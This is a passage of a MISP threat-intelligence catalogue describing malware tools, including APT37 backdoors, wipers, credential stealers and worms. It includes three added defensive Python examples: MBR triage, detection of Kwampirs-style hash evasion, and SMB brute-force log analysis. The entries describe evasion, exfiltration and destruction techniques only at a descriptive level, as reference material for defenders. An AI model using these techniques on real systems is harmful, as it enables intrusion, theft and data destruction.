Table 16596. Table References

Links

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20group%20using%20Neuron%20and%20Nautilus%20tools%20alongside%20Snake%20malware_0.pdf

Nautilus

Nautilus is very similar to Neuron both in the targeting of mail servers and in how client communications are performed. This malware is referred to as Nautilus due to its embedded internal DLL name “nautilus-service.dll”, again sharing some resemblance to Neuron. The Nautilus service listens for HTTP requests from clients to process tasking requests such as executing commands, deleting files and writing files to disk.

The tag is: misp-galaxy:tool="Nautilus"

Nautilus has relationships with:

  • similar: misp-galaxy:malpedia="Nautilus" with estimative-language:likelihood-probability="likely"

Table 16597. Table References

Links

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20group%20using%20Neuron%20and%20Nautilus%20tools%20alongside%20Snake%20malware_0.pdf

Gamut Botnet

Gamut was found to be downloaded by a Trojan Downloader that arrives as an attachment from a spam email message. The bot installation is quite simple. After the malware binary has been downloaded, it launches itself from its current directory, usually the Windows %Temp% folder, and installs itself as a Windows service. The malware utilizes an anti-VM (virtual machine) trick and terminates itself if it detects that it is running in a virtual machine environment. The bot uses the INT 03h trap sporadically in its code, an anti-debugging technique which prevents its code from running within a debugger environment. It can also determine if it is being debugged by using the Kernel32 API function IsDebuggerPresent.

The tag is: misp-galaxy:tool="Gamut Botnet"

Table 16598. Table References

Links

https://www.bleepingcomputer.com/news/security/necurs-and-gamut-botnets-account-for-97-percent-of-the-internets-spam-emails/

https://www.trustwave.com/Resources/SpiderLabs-Blog/Gamut-Spambot-Analysis/

CORALDECK

CORALDECK is an exfiltration tool that searches for specified files and exfiltrates them in password-protected archives using hardcoded HTTP POST headers. CORALDECK has been observed dropping and using WinRAR to exfiltrate data in password-protected RAR files, as well as WinImage and zip archives.

The tag is: misp-galaxy:tool="CORALDECK"

CORALDECK is also known as:

  • APT.InfoStealer.Win.CORALDECK

  • FE_APT_InfoStealer_Win_CORALDECK_1

CORALDECK has relationships with:

  • similar: misp-galaxy:mitre-malware="CORALDECK - S0212" with estimative-language:likelihood-probability="likely"

Table 16599. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

DOGCALL

DOGCALL is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex. DOGCALL was used to target South Korean Government and military organizations in March and April 2017. The malware is typically dropped using an HWP exploit in a lure document. The wiper tool, RUHAPPY, was found on some of the systems targeted by DOGCALL. While DOGCALL is primarily an espionage tool, RUHAPPY is a destructive wiper tool meant to render systems inoperable.

The tag is: misp-galaxy:tool="DOGCALL"

DOGCALL is also known as:

  • FE_APT_RAT_DOGCALL

  • FE_APT_Backdoor_Win32_DOGCALL_1

  • APT.Backdoor.Win.DOGCALL

DOGCALL has relationships with:

  • similar: misp-galaxy:mitre-malware="DOGCALL - S0213" with estimative-language:likelihood-probability="likely"

Table 16600. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

GELCAPSULE

GELCAPSULE is a downloader traditionally dropped or downloaded by an exploit document. GELCAPSULE has been observed downloading SLOWDRIFT to victim systems.

The tag is: misp-galaxy:tool="GELCAPSULE"

GELCAPSULE is also known as:

  • FE_APT_Downloader_Win32_GELCAPSULE_1

Table 16601. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

HAPPYWORK

HAPPYWORK is a malicious downloader that can download and execute a second-stage payload, collect system information, and beacon it to the command and control domains. The collected system information includes: computer name, user name, system manufacturer via registry, IsDebuggerPresent state, and execution path. In November 2016, HAPPYWORK targeted government and financial targets in South Korea.

The tag is: misp-galaxy:tool="HAPPYWORK"

HAPPYWORK is also known as:

  • FE_APT_Downloader_HAPPYWORK

  • FE_APT_Exploit_HWP_Happy

  • Downloader.APT.HAPPYWORK

HAPPYWORK has relationships with:

  • similar: misp-galaxy:mitre-malware="HAPPYWORK - S0214" with estimative-language:likelihood-probability="likely"

Table 16602. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

KARAE

Karae backdoors are typically used as first-stage malware after an initial compromise. The backdoors can collect system information, upload and download files, and may be used to retrieve a second-stage payload. The malware uses public cloud-based storage providers for command and control. In March 2016, KARAE malware was distributed through torrent file-sharing websites for South Korean users. During this campaign, the malware used a YouTube video downloader application as a lure.

The tag is: misp-galaxy:tool="KARAE"

KARAE is also known as:

  • FE_APT_Backdoor_Karae_enc

  • FE_APT_Backdoor_Karae

  • Backdoor.APT.Karae

KARAE has relationships with:

  • similar: misp-galaxy:mitre-malware="KARAE - S0215" with estimative-language:likelihood-probability="likely"

Table 16603. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

MILKDROP

MILKDROP is a launcher that sets a persistence registry key and launches a backdoor.

The tag is: misp-galaxy:tool="MILKDROP"

MILKDROP is also known as:

  • FE_Trojan_Win32_MILKDROP_1

Table 16604. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

POORAIM

POORAIM malware is designed with basic backdoor functionality and leverages AOL Instant Messenger for command and control communications. POORAIM includes the following capabilities: System information enumeration, File browsing, manipulation and exfiltration, Process enumeration, Screen capture, File execution, Exfiltration of browser favorites, and battery status. Exfiltrated data is sent via files over AIM. POORAIM has been involved in campaigns against South Korean media organizations and sites relating to North Korean refugees and defectors since early 2014. Compromised sites have acted as watering holes to deliver newer variants of POORAIM.

The tag is: misp-galaxy:tool="POORAIM"

POORAIM is also known as:

  • Backdoor.APT.POORAIM

POORAIM has relationships with:

  • similar: misp-galaxy:mitre-malware="POORAIM - S0216" with estimative-language:likelihood-probability="likely"

Table 16605. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

RICECURRY

RICECURRY is a JavaScript-based profiler used to fingerprint a victim’s web browser and deliver malicious code in return. Browser, operating system, and Adobe Flash version are detected by RICECURRY, which may be a modified version of PluginDetect.

The tag is: misp-galaxy:tool="RICECURRY"

RICECURRY is also known as:

  • Exploit.APT.RICECURRY

Table 16606. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

RUHAPPY

RUHAPPY is a destructive wiper tool seen on systems targeted by DOGCALL. It attempts to overwrite the MBR, causing the system not to boot. When victims' systems attempt to boot, the string 'Are you Happy?' is displayed. The malware is believed to be tied to the developers of DOGCALL and HAPPYWORK based on similar PDB paths in all three.

The tag is: misp-galaxy:tool="RUHAPPY"

RUHAPPY is also known as:

  • FE_APT_Trojan_Win32_RUHAPPY_1

Table 16607. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

SHUTTERSPEED

SHUTTERSPEED is a backdoor that can collect system information, acquire screenshots, and download/execute an arbitrary executable. SHUTTERSPEED typically requires an argument at runtime in order to execute fully. Observed arguments used by SHUTTERSPEED include: 'help', 'console', and 'sample'. The spear phishing email messages contained documents exploiting RTF vulnerability CVE-2017-0199. Many of the compromised domains in the command and control infrastructure are linked to South Korean companies. Most of these domains host a fake webpage pertinent to targets.

The tag is: misp-galaxy:tool="SHUTTERSPEED"

SHUTTERSPEED is also known as:

  • FE_APT_Backdoor_SHUTTERSPEED

  • APT.Backdoor.SHUTTERSPEED

SHUTTERSPEED has relationships with:

  • similar: misp-galaxy:mitre-malware="SHUTTERSPEED - S0217" with estimative-language:likelihood-probability="likely"

Table 16608. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

SLOWDRIFT

SLOWDRIFT is a launcher that communicates via cloud-based infrastructure. It sends system information to the attacker command and control and then downloads and executes additional payloads. Lure documents distributing SLOWDRIFT were not tailored for specific victims, suggesting that TEMP.Reaper is attempting to widen its target base across multiple industries and in the private sector. SLOWDRIFT was seen being deployed against academic and strategic targets in South Korea using lure emails with documents leveraging the HWP exploit. Recent SLOWDRIFT samples were uncovered in June 2017 with lure documents pertaining to cyber crime prevention and news stories. These documents were last updated by the same actor who developed KARAE, POORAIM and ZUMKONG.

The tag is: misp-galaxy:tool="SLOWDRIFT"

SLOWDRIFT is also known as:

  • FE_APT_Downloader_Win_SLOWDRIFT_1

  • FE_APT_Downloader_Win_SLOWDRIFT_2

  • APT.Downloader.SLOWDRIFT

SLOWDRIFT has relationships with:

  • similar: misp-galaxy:mitre-malware="SLOWDRIFT - S0218" with estimative-language:likelihood-probability="likely"

Table 16609. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

SOUNDWAVE

SOUNDWAVE is a Windows-based audio capturing utility. Via the command line it accepts the -l switch (probably for "listen"), captures microphone input for 100 minutes, and writes the data out to a log file in this format: C:\Temp\HncDownload\YYYYMMDDHHMMSS.log.

The tag is: misp-galaxy:tool="SOUNDWAVE"

SOUNDWAVE is also known as:

  • FE_APT_HackTool_Win32_SOUNDWAVE_1

Table 16610. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

ZUMKONG

ZUMKONG is a credential stealer capable of harvesting usernames and passwords stored by Internet Explorer and Chrome browsers. Stolen credentials are emailed to the attacker via HTTP POST requests to mail[.]zmail[.]ru.

The tag is: misp-galaxy:tool="ZUMKONG"

ZUMKONG is also known as:

  • FE_APT_Trojan_Zumkong

  • Trojan.APT.Zumkong

Table 16611. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

WINERACK

WINERACK is a backdoor whose primary features include user and host information gathering, process creation and termination, filesystem and registry manipulation, as well as the creation of a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands. Other capabilities include the enumeration of files, directories, services, active windows and processes.

The tag is: misp-galaxy:tool="WINERACK"

WINERACK is also known as:

  • FE_APT_Backdoor_WINERACK

  • Backdoor.APT.WINERACK

WINERACK has relationships with:

  • similar: misp-galaxy:mitre-malware="WINERACK - S0219" with estimative-language:likelihood-probability="likely"

Table 16612. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

RoyalCli

The RoyalCli backdoor appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. NCC Group chose the name RoyalCli because of a debugging path left in the binary: 'c:\users\wizard\documents\visual studio 2010\Projects\RoyalCli\Release\RoyalCli.pdb'. RoyalCli and BS2005 both communicate with the attacker's command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2. A consequence of this technique is that C2 data is cached to disk by the IE process.

The tag is: misp-galaxy:tool="RoyalCli"

RoyalCli has relationships with:

  • similar: misp-galaxy:malpedia="RoyalCli" with estimative-language:likelihood-probability="likely"

Table 16613. Table References

Links

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

SHARPKNOT

The tag is: misp-galaxy:tool="SHARPKNOT"

SHARPKNOT has relationships with:

  • similar: misp-galaxy:malpedia="SHARPKNOT" with estimative-language:likelihood-probability="likely"

Table 16615. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf

KillDisk Wiper

KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine's energy sector as well as its banking, rail and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms. The note accompanying the ransomware versions, as in the case of Petya, was a ruse: because KillDisk also overwrites and deletes files (and does not store the encryption keys on disk or online), recovering the scrambled files was out of the question. The new variant Trend Micro found, however, does not include a ransom note.

The tag is: misp-galaxy:tool="KillDisk Wiper"

KillDisk Wiper is also known as:

  • KillDisk

KillDisk Wiper has relationships with:

  • similar: misp-galaxy:malpedia="KillDisk" with estimative-language:likelihood-probability="likely"

Table 16616. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/

UselessDisk

A new MBR bootlocker called DiskWriter, or UselessDisk, overwrites the MBR of a victim's computer and then displays a ransom screen on reboot instead of booting into Windows. The ransom note asks for $300 in Bitcoin to regain access to Windows. It might be a wiper.
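UselessDisk's damage is confined to the first sector of the disk, so an incident responder's first check is the MBR itself. The following is an added example, not code from the page or from the BleepingComputer article: a small Python MBR parser and triage routine run over two constructed 512-byte sectors (a plausible clean layout and one overwritten by a lock screen). The sample boot-code bytes and the 24-byte printable-run threshold used as a text indicator are assumptions for illustration.

```python
"""Offline triage of a 512-byte boot sector: parse the partition table and
boot signature, then flag the traits an MBR bootlocker such as UselessDisk
leaves behind (zeroed or text-filled boot code, empty partition table,
missing 0x55AA signature)."""
import struct

SECTOR_SIZE = 512
PART_TABLE_OFFSET = 446       # four 16-byte partition entries start here
BOOT_SIG_OFFSET = 510         # the last two bytes must be 0x55 0xAA
ENTRY_FMT = "<B3xB3xII"       # status, (CHS start), type, (CHS end), LBA start, sector count


def parse_mbr(sector: bytes) -> dict:
    """Split one sector into boot code, non-empty partition entries and the signature check."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    partitions = []
    for i in range(4):
        status, ptype, lba_start, count = struct.unpack_from(
            ENTRY_FMT, sector, PART_TABLE_OFFSET + 16 * i)
        if ptype != 0:  # type 0 marks an unused entry
            partitions.append({"index": i, "bootable": status == 0x80,
                               "type": ptype, "lba_start": lba_start,
                               "sectors": count})
    signature = sector[BOOT_SIG_OFFSET:BOOT_SIG_OFFSET + 2]
    return {"boot_code": sector[:PART_TABLE_OFFSET],
            "partitions": partitions,
            "signature_ok": signature == b"\x55\xAA"}


def longest_printable_run(data: bytes) -> int:
    """Length of the longest run of printable ASCII; lock screens embed their text here."""
    run = longest = 0
    for b in data:
        run = run + 1 if 32 <= b < 127 else 0
        longest = max(longest, run)
    return longest


def triage(sector: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if not info["partitions"]:
        findings.append("partition table empty")
    code = info["boot_code"]
    if not any(code):
        findings.append("boot code zeroed")
    run = longest_printable_run(code)
    if run >= 24:  # assumed threshold: real boot code has only short printable runs
        findings.append(f"{run}-byte printable text run in boot code")
    return findings


def build_mbr(boot_code: bytes, partitions: list, signature: bytes = b"\x55\xAA") -> bytes:
    """Constructed test helper: assemble a sector from boot code,
    (type, lba_start, sectors) tuples and a signature."""
    sector = bytearray(SECTOR_SIZE)
    code = boot_code[:PART_TABLE_OFFSET]
    sector[:len(code)] = code
    for i, (ptype, lba, count) in enumerate(partitions[:4]):
        struct.pack_into(ENTRY_FMT, sector, PART_TABLE_OFFSET + 16 * i,
                         0x80 if i == 0 else 0x00, ptype, lba, count)
    sector[BOOT_SIG_OFFSET:] = signature
    return bytes(sector)


# Constructed samples, not real disk images: a plausible Windows-style MBR and
# one whose boot code and partition table were overwritten by a lock screen.
CLEAN_MBR = build_mbr(b"\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x90" * 100,
                      [(0x07, 2048, 204800)])
LOCKED_MBR = build_mbr(b"\xB8\x13\x00\xCD\x10"
                       + b"Your files are locked. Pay $300 to recover."
                       + b"\x00" * 50, [])

if __name__ == "__main__":
    for name, mbr in (("clean", CLEAN_MBR), ("locked", LOCKED_MBR)):
        print(name, triage(mbr) or "no findings")
```

To check a real disk or image you are authorised to examine, read its first 512 bytes and pass them to triage(); an overwritten record usually shows the empty partition table and the long text run together, while an intact MBR shows neither.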

The tag is: misp-galaxy:tool="UselessDisk"

UselessDisk is also known as:

  • DiskWriter

Table 16617. Table References

Links

https://www.bleepingcomputer.com/news/security/the-diskwriter-or-uselessdisk-bootlocker-may-be-a-wiper/

GoScanSSH

During an Incident Response (IR) engagement, Talos identified a new malware family being used to compromise SSH servers exposed to the internet. This malware, which Talos named GoScanSSH, was written in the Go programming language and exhibited several interesting characteristics. It is not the first malware family Talos has observed written in Go, but malware in this language is still relatively uncommon. In this case the attacker also created unique malware binaries for each host infected with GoScanSSH. Additionally, the GoScanSSH command and control (C2) infrastructure leveraged the Tor2Web proxy service in an attempt to make tracking the attacker-controlled infrastructure more difficult and more resilient to takedowns.

The tag is: misp-galaxy:tool="GoScanSSH"

Table 16618. Table References

Links

http://blog.talosintelligence.com/2018/03/goscanssh-analysis.html

https://www.bleepingcomputer.com/news/security/goscanssh-malware-avoids-government-and-military-servers/

Rovnix

Trend Micro found that the malware family ROVNIX is capable of being distributed via a macro downloader. This technique was previously seen in the DRIDEX malware, which was notable for using the same routines. DRIDEX is also known as the successor of the banking malware CRIDEX.

The tag is: misp-galaxy:tool="Rovnix"

Rovnix is also known as:

  • ROVNIX

Rovnix has relationships with:

  • similar: misp-galaxy:malpedia="Rovnix" with estimative-language:likelihood-probability="likely"

Table 16619. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/

Kwampirs

Once Orangeworm has infiltrated a victim’s network, they deploy Trojan.Kwampirs, a backdoor Trojan that provides the attackers with remote access to the compromised computer. When executed, Kwampirs decrypts and extracts a copy of its main DLL payload from its resource section. Before writing the payload to disk, it inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.
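The random string Kwampirs inserts into its dropped DLL defeats indicators that are just file hashes, since every victim's copy hashes differently. The block below is an added illustration, not the page's or Symantec's code: it mimics the insertion on a constructed stand-in payload, then compares a hash blocklist against a stable byte-sequence signature and an n-gram similarity score (a simplified form of the idea behind fuzzy hashes such as ssdeep). The payload bytes, the signature offset and the 16-byte junk length are assumptions.

```python
"""Why a per-file hash is a weak indicator for Kwampirs-style droppers: the DLL
written to disk carries a random string at its midpoint, so every victim gets a
different SHA-256, while byte-pattern and similarity-based matching still work."""
import hashlib
import os
import random

# Constructed stand-in for the decrypted DLL payload (not a real sample).
_rng = random.Random(1337)
REFERENCE_PAYLOAD = bytes(_rng.getrandbits(8) for _ in range(1024))
# A 32-byte sequence from a stable region, as a YARA-style string would be (assumed offset).
SIGNATURE = REFERENCE_PAYLOAD[100:132]
ALPHABET = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def drop_with_random_string(payload: bytes, length: int = 16) -> bytes:
    """Mimic the evasion: insert a random alphanumeric string at the payload's midpoint."""
    junk = bytes(ALPHABET[b % len(ALPHABET)] for b in os.urandom(length))
    mid = len(payload) // 2
    return payload[:mid] + junk + payload[mid:]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_match(sample: bytes, known_hashes: set) -> bool:
    """Hash-based detection: exact-match the file digest against a blocklist."""
    return sha256_hex(sample) in known_hashes


def signature_match(sample: bytes, signature: bytes = SIGNATURE) -> bool:
    """Pattern-based detection: look for a stable byte sequence anywhere in the file."""
    return signature in sample


def ngram_similarity(a: bytes, b: bytes, n: int = 8) -> float:
    """Jaccard similarity of the sets of n-byte windows. An insertion only
    disturbs the windows overlapping the inserted bytes, so the score stays high."""
    grams_a = {a[i:i + n] for i in range(len(a) - n + 1)}
    grams_b = {b[i:i + n] for i in range(len(b) - n + 1)}
    return len(grams_a & grams_b) / len(grams_a | grams_b)


def evaluate(victims: int = 3) -> dict:
    """Drop the payload on several simulated victims and compare the detections."""
    known = {sha256_hex(REFERENCE_PAYLOAD)}
    drops = [drop_with_random_string(REFERENCE_PAYLOAD) for _ in range(victims)]
    return {
        "distinct_hashes": len({sha256_hex(d) for d in drops}),
        "hash_hits": sum(hash_match(d, known) for d in drops),
        "signature_hits": sum(signature_match(d) for d in drops),
        "min_similarity": min(ngram_similarity(REFERENCE_PAYLOAD, d) for d in drops),
    }


if __name__ == "__main__":
    print(evaluate())
```

With three simulated victims the hash blocklist scores zero hits against three distinct digests, while the byte signature hits every drop and the similarity to the reference stays above 0.9; that is the practical reason to publish byte patterns or fuzzy hashes for this family rather than file hashes alone.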

The tag is: misp-galaxy:tool="Kwampirs"

Kwampirs has relationships with:

  • similar: misp-galaxy:malpedia="Kwampirs" with estimative-language:likelihood-probability="likely"

Table 16620. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

Rubella Macro Builder

A crimeware kit dubbed the Rubella Macro Builder has recently been gaining popularity among members of a top-tier Russian hacking forum. Despite being relatively new and unsophisticated, the kit has a clear appeal for cybercriminals: it’s cheap, fast, and can defeat basic static antivirus detection.

The tag is: misp-galaxy:tool="Rubella Macro Builder"

Table 16621. Table References

Links

https://www.flashpoint-intel.com/blog/rubella-macro-builder/

kitty Malware

Researchers at Imperva's Incapsula said a new piece of malware called Kitty leaves a note for cat lovers. It attacks the Drupal content management system (CMS) to illegally mine the cryptocurrency Monero.

The tag is: misp-galaxy:tool="kitty Malware"

Table 16622. Table References

Links

https://www.zdnet.com/article/hello-kitty-malware-targets-drupal-to-mine-for-cryptocurrency/

https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/

https://cryptovest.com/news/hello-kitty-new-malware-me0ws-its-way-into-mining-monero/

Maikspy

Trend Micro discovered a malware family called Maikspy, a multi-platform spyware that can steal users' private data. The spyware targets Windows and Android users, and first posed as an adult game named after a popular U.S.-based adult film actress. Maikspy, an alias that combines the name of the adult film actress and "spyware", has been around since 2016.

The tag is: misp-galaxy:tool="Maikspy"

Table 16623. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/maikspy-spyware-poses-as-adult-game-targets-windows-and-android-users/

Huigezi malware

Backdoor trojan found prevalently in China.

The tag is: misp-galaxy:tool="Huigezi malware"

Table 16624. Table References

Links

https://www.bleepingcomputer.com/news/gaming/chinese-police-arrest-15-people-who-hid-malware-inside-pubg-cheat-apps/

FacexWorm

Facebook, Chrome and cryptocurrency users should be on the lookout for a new malware strain named FacexWorm that infects victims for the purpose of stealing passwords, stealing cryptocurrency funds, running cryptojacking scripts and spamming Facebook users. This strain was spotted in late April 2018 by Trend Micro researchers and appears to be related to two other Facebook Messenger spam campaigns, one from August 2017 and another from December 2017, the latter spreading the Digmine malware. Researchers say FacexWorm's modus operandi is similar to the previous two campaigns, but with the addition of new techniques aimed at cryptocurrency users.

The tag is: misp-galaxy:tool="FacexWorm"

Table 16625. Table References

Links

https://www.bleepingcomputer.com/news/security/facexworm-spreads-via-facebook-messenger-malicious-chrome-extension/

Bankshot

Implant used in Operation GhostSecret.

The tag is: misp-galaxy:tool="Bankshot"

Bankshot has relationships with:

  • similar: misp-galaxy:malpedia="Bankshot" with estimative-language:likelihood-probability="likely"

Table 16626. Table References

Links

https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/

Proxysvc

Downloader used in Operation GhostSecret.

The tag is: misp-galaxy:tool="Proxysvc"

Table 16627. Table References

Links

https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/

Escad

Backdoor used in Operation GhostSecret.

The tag is: misp-galaxy:tool="Escad"

Table 16628. Table References

Links

https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/

StalinLocker

StalinLocker, or StalinScreamer, is an in-development screenlocker/wiper discovered by MalwareHunterTeam that gives the victim 10 minutes to enter a code before it tries to delete the contents of the computer's drives. While running, it displays a screen showing Stalin, plays the USSR anthem and shows a countdown until the files are deleted.

The tag is: misp-galaxy:tool="StalinLocker"

StalinLocker is also known as:

  • StalinScreamer

StalinLocker has relationships with:

  • similar: misp-galaxy:malpedia="StalinLocker" with estimative-language:likelihood-probability="almost-certain"

Table 16629. Table References

Links

https://www.bleepingcomputer.com/news/security/stalinlocker-deletes-your-files-unless-you-enter-the-right-code/

VPNFilter

Advanced, likely state-sponsored or state-affiliated modular malware. The code of this malware overlaps with versions of the BlackEnergy malware. Targeted devices are Linksys, MikroTik, NETGEAR and TP-Link networking equipment in the small and home office (SOHO) space, as well as QNAP network-attached storage (NAS) systems.

The tag is: misp-galaxy:tool="VPNFilter"

VPNFilter has relationships with:

  • similar: misp-galaxy:malpedia="VPNFilter" with estimative-language:likelihood-probability="almost-certain"

Table 16630. Table References

Links

https://blog.talosintelligence.com/2018/05/VPNFilter.html

https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/new-vpnfilter-malware-infects-routers/

https://www.fortinet.com/blog/threat-research/defending-against-the-new-vpnfilter-botnet.html

Iron Backdoor

Iron Backdoor uses virtual machine detection code taken directly from the leaked source code of HackingTeam's Soldier implant. It also uses the DynamicCall module from the HackingTeam core library. The backdoor was used to drop cryptocurrency miners.

The tag is: misp-galaxy:tool="Iron Backdoor"

Table 16631. Table References

Links

https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/

Brambul

Brambul malware is a malicious Windows 32-bit SMB worm that functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims’ networks by dropper malware. When executed, the malware attempts to establish contact with victim systems and IP addresses on victims’ local subnets. If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks.
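Brambul's behaviour on the wire (one host failing SMB logons against many neighbours and random external addresses in quick succession) is easy to pick out of authentication or connection logs. The following is an added example, not code from the page or the US-CERT alert: detection logic run over a constructed log excerpt. The log format, the local subnet 10.0.5.0/24 and the thresholds (eight failures against at least four hosts within five minutes) are assumptions to be tuned to your own telemetry.

```python
"""Detection logic for Brambul-style SMB brute forcing: one source producing
many authentication failures against many hosts on 139/445 inside a short
window, including addresses outside its own subnet (the worm also targets
randomly generated IPs). Runs over constructed log lines."""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

# Constructed sample, not from a real incident: time, source, destination, port, result.
SAMPLE_LOG = """\
2018-05-29T10:00:01 10.0.5.23 10.0.5.40 445 AUTH_FAIL
2018-05-29T10:00:02 10.0.5.23 10.0.5.40 445 AUTH_FAIL
2018-05-29T10:00:04 10.0.5.23 10.0.5.41 445 AUTH_FAIL
2018-05-29T10:00:05 10.0.5.23 10.0.5.41 445 AUTH_FAIL
2018-05-29T10:00:07 10.0.5.23 10.0.5.42 139 AUTH_FAIL
2018-05-29T10:00:09 10.0.5.23 10.0.5.43 445 AUTH_FAIL
2018-05-29T10:00:10 10.0.5.23 10.0.5.43 445 AUTH_FAIL
2018-05-29T10:00:12 10.0.5.23 203.0.113.7 445 AUTH_FAIL
2018-05-29T10:00:14 10.0.5.23 198.51.100.9 445 AUTH_FAIL
2018-05-29T10:00:15 10.0.5.23 198.51.100.9 445 AUTH_FAIL
2018-05-29T10:00:16 10.0.5.23 10.0.5.43 445 AUTH_OK
2018-05-29T10:01:30 10.0.5.99 10.0.5.40 445 AUTH_FAIL
2018-05-29T10:01:35 10.0.5.99 10.0.5.40 445 AUTH_FAIL
2018-05-29T10:01:40 10.0.5.99 10.0.5.40 445 AUTH_OK
2018-05-29T10:02:00 10.0.5.50 10.0.5.40 443 AUTH_FAIL
"""


def parse_log(text: str):
    """Yield (timestamp, src, dst, port, result) tuples, skipping blank lines."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, result = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(port), result


def detect_smb_bruteforce(text: str, local_net: str = "10.0.5.0/24",
                          window: timedelta = timedelta(minutes=5),
                          min_failures: int = 8, min_targets: int = 4) -> list:
    """Alert on sources whose densest window of SMB failures exceeds both thresholds."""
    net = ipaddress.ip_network(local_net)
    failures = defaultdict(list)
    for ts, src, dst, port, result in parse_log(text):
        if port in (139, 445) and result == "AUTH_FAIL":
            failures[src].append((ts, dst))

    alerts = []
    for src, events in failures.items():
        events.sort()
        # Sliding window: find the span no longer than `window` holding the most failures.
        best, start = (0, 0), 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start > best[1] - best[0]:
                best = (start, end)
        span = events[best[0]:best[1] + 1]
        targets = {dst for _, dst in span}
        if len(span) >= min_failures and len(targets) >= min_targets:
            alerts.append({
                "src": src,
                "failures": len(span),
                "targets": len(targets),
                # Random-IP scanning shows up as destinations outside the local subnet.
                "external_targets": sorted(
                    d for d in targets if ipaddress.ip_address(d) not in net),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(SAMPLE_LOG):
        print(alert)
```

The two-failure-then-success pattern from 10.0.5.99 (a mistyped password) stays below the thresholds, while 10.0.5.23 is flagged with ten failures against six hosts, two of them outside the subnet; the external destinations are the quickest way to distinguish a worm from a misconfigured service account.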

The tag is: misp-galaxy:tool="Brambul"

Brambul has relationships with:

  • similar: misp-galaxy:malpedia="Brambul" with estimative-language:likelihood-probability="likely"

Table 16632. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-149A

PLEAD

PLEAD comes in two kinds: a RAT (Remote Access Tool) and a downloader. The RAT operates on commands provided by C&C servers. The PLEAD downloader, on the other hand, downloads modules and runs them in memory in the same way as TSCookie does.

The tag is: misp-galaxy:tool="PLEAD"

PLEAD has relationships with:

  • similar: misp-galaxy:malpedia="PLEAD (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="TSCookie" with estimative-language:likelihood-probability="likely"

Table 16633. Table References

Links

https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html

BabaYaga

